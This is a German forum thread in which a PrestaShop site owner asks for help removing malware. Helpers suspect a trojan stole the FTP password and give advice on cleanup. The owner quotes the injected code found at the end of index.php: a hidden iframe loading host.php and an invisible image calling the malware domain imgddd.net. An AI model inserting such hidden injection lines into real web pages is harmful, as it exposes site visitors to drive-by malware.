Home » Viren, Trojaner & Malware Forum » Malware auf Webspace mit PrestaShop-Script entfernen » Themenansicht
Malware auf Webspace mit PrestaShop-Script entfernen |
||
|---|---|---|
| #0
| ||
|
28.07.2011, 09:54
...neu hier
Beiträge: 2 |
||
 
|
|
|
|
28.07.2011, 10:13
Member
 Beiträge: 4730 |
#2
Wo hast Du die Shopsoftware heruntergeladen? Welche Version hast Du installiert?
__________ Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren. Der Grabsteinschubser |
|
|
|
|
|
|
28.07.2011, 10:15
Member
Beiträge: 4730 |
#3
Übrigens ist es sehr wahrscheinlich, dass Dein Rechner mit einem Trojaner infiziert ist, der das FTP-Passwort abgefangen hat: http://redleg-redleg.blogspot.com/2011/05/cleaning-up-imgaaanet-or-imgbbb-or.html
Deshalb dies abarbeiten: http://board.protecus.de/t40182.htm __________ Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren. Der Grabsteinschubser |
|
|
|
|
|
|
28.07.2011, 11:36
...neu hier
Themenstarter Beiträge: 2 |
#4
Nutze Version 1.3.6.0. (Aktuellste ist 1.4.3, aber viel zeit liegt da nicht dazwischen)
Habe einen Scan durchgeführt und den Code noch in der index.php entdeckt: ?><iframe style="visibility:hidden;display:none" src="host.php" ></iframe> <img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725"> Habe diesen Code entfernt, nun blockiert Chrome die Seite nicht mehr. Befürchte aber das es sich möglicherweise wieder iwann selbst neu installiert und irgendwo eine Backdoor-datei drin ist? Danke für die beiden Links. Vielleicht werde ich aber auch den Laptop formatieren und Version 1.4.3. sauber aufspielen + ftp-daten ändern...ist zwar viel Arbeit aber wenn es auf jeden Fall hilft... |
|
|
|
|
|
|
28.07.2011, 14:03
Member
Beiträge: 34 |
#5
Hast du nur Webspace oder einen vServer/Root-Server?
|
|
|
|
|
|
|
28.07.2011, 18:42
Member
Beiträge: 4730 |
#6
Es ist am Wahrscheinlichsten, dass der FTP-Account kompromittiert wurde (Passwort durch einen Trojaner abgefangen). Es kommt aber auch in Frage, dass eins der in der Version 1.3.6 verwendeten Scripts unsicher ist und einen Angriff zugelassen hat. Das prüfen wir aber später - jetzt muss erstmal der Schaden kleingehalten werden, weshalb ich Dir dazu rate, unbedingt von einem anderen PC aus das FTP-Passwort zu ändern. Und bitte ignoriere SYN-SYNACK-ACK, der trollt hier meistens nur rum.
__________ Dies ist eine Signatur! Persönlicher Service: Du kommst aus Berlin? Dann melde Dich per PN bei mir, evtl. können wir einen Termin vereinbaren. Der Grabsteinschubser |
|
|
|
|
|
|
28.07.2011, 18:47
Member
Beiträge: 34 |
#7
@Gool
Aha, wie du meinst. Aber das du (der super-mega-absolut-übermensch) nicht danach fragst ist schon schwach. Bei einem vServer kann der Angreifer auch über ssh gekommen sein und könnte u.a. den Server zum spreaden von Warez benutzten. Also von daher. |
|
|
|
|
|
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!
bitte erst » hier kostenlos registrieren!!
Folgende Themen könnten Dich auch interessieren:
Seite(n): 1
Copyright © 2024, Protecus.de - Protecus Team - Impressum / Mediadaten
Die Meldung lautete:
...enthält Inhalte von imgddd.net, einer Website, die bekanntermaßen Malware enthält.
Dann habe ich die Webmastertools von Google benutzt.
Googlebot zeigt folgendes ganz am Ende an:
<!-- /MODULE Block various links --></div>
</div>
</body>
</html><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>
<img heigth="1" width="1" border="0" src="http://imgddd.net/t.php?id=16466725">
Die host.php habe ich entfernt, hat aber leider nicht geholfen, wäre ja auch zu einfach gewesen :-(
Bin über jeden Tip dankbar, da ich mich mit Malware leider kaum auskenne...